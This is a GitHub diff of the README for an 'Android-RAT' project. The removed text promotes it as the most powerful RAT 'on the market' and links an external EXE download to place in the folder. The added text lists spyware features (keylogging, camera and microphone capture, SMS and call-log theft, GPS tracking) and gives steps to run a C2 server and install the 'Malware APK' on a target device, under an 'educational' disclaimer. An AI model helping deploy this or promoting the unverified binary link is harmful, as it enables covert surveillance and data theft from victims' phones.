|
1 | 1 |  |
2 | 2 |  |
3 | 3 | # Android-RAT |
4 | | -Most powerfull Android RAT on the market |
5 | | -This is the main file |
6 | | -# THIS IS THE LINK FOR EXE YOU WILL NEED TO PUT IN THE FOLDER https://gofile.io/d/xEmJA7 |
| 4 | +🕵️♂️ Android-RAT |
| 5 | +A powerful Remote Access Tool (RAT) for Android, designed for educational and ethical use. |
| 6 | + |
| 7 | + |
| 8 | +📜 Disclaimer |
| 9 | +⚠️ This project is intended for educational and authorized testing purposes only. |
| 10 | +Misuse of this tool for illegal activities is strictly prohibited. The author assumes no responsibility for any misuse. |
| 11 | + |
| 12 | +📌 Features |
| 13 | +✅ Remote control of Android devices |
| 14 | +✅ File management (upload/download/delete) |
| 15 | +✅ Keylogging |
| 16 | +✅ Microphone & Camera access |
| 17 | +✅ SMS & Call logs retrieval |
| 18 | +✅ GPS tracking |
| 19 | + |
| 20 | +(More features coming soon!) |
| 21 | + |
| 22 | +🛠 Installation |
| 23 | +🔹 Server (Command & Control - C2) |
| 24 | +1️⃣ Clone the repository: |
| 25 | + |
| 26 | +sh |
| 27 | +Copy |
| 28 | +git clone https://github.com/z3vke/Android-RAT.git |
| 29 | +cd Android-RAT/server |
| 30 | +2️⃣ Install dependencies: |
| 31 | + |
| 32 | +sh |
| 33 | +Copy |
| 34 | +pip install -r requirements.txt # If using Python |
| 35 | +3️⃣ Run the server: |
| 36 | + |
| 37 | +sh |
| 38 | +Copy |
| 39 | +python server.py |
| 40 | +🔹 Android Client (Malware APK) |
| 41 | +1️⃣ Open the client/ folder in Android Studio. |
| 42 | +2️⃣ Build & generate the APK. |
| 43 | +3️⃣ Install it on the target Android device. |
| 44 | + |
| 45 | +🚀 Usage |
| 46 | +1️⃣ Start the C2 server and wait for connections. |
| 47 | +2️⃣ Install the Android Client (APK) on the target device. |
| 48 | +3️⃣ Control the device remotely using available commands. |
| 49 | + |
| 50 | +🔹 Full list of commands: Commands.md |
| 51 | + |
| 52 | +🔐 Security & Legal Notes |
| 53 | +Do NOT use this on unauthorized devices. |
| 54 | + |
| 55 | +Encrypt the connection to prevent interception. |
| 56 | + |
| 57 | +Implement authentication to avoid misuse. |
| 58 | + |
| 59 | +📌 Roadmap |
| 60 | + Add end-to-end encryption |
| 61 | + |
| 62 | + Implement a web-based control panel |
| 63 | + |
| 64 | + Improve UI/UX of the Android client |
| 65 | + |
| 66 | +🤝 Contributing |
| 67 | +🔹 Pull requests are welcome! Open an issue if you have feature suggestions or found a bug. |
| 68 | + |
| 69 | +📜 License |
| 70 | +This project is licensed under the MIT License – see the LICENSE file for details. |
| 71 | + |
| 72 | +📞 Contact |
| 73 | +📧 Author: [Your Name] |
| 74 | +📂 GitHub: @z3vke |
7 | 75 |
|
8 | | -# For educational purposes only |
9 | | -# IM NOT RESPOSIBLE FOR ANY DAMAGE U CAUSE BY MY TOOL |
|
0 commit comments